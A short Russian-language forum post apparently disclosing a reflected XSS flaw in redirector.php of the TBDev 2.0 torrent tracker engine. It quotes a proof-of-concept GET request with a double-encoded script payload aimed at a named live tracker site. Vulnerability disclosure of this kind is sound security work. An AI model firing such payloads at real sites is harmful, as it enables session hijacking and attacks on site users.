Тема: Трекер-движок TBDev 2.0
Показать сообщение отдельно

  #10  
Старый 25.04.2014, 14:21
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию
Небольшой UP

passive XSS (reflected)

Уязвимый сценарий: redirector.php

Exploit:

Цитата:
Сообщение от None  
GET /redirector.php?url=%253cscript%253ealert%25281%252 9%253c%25 HTTP/1.1
Host: bit-torrent.kiev.ua
....
 
Ответить с цитированием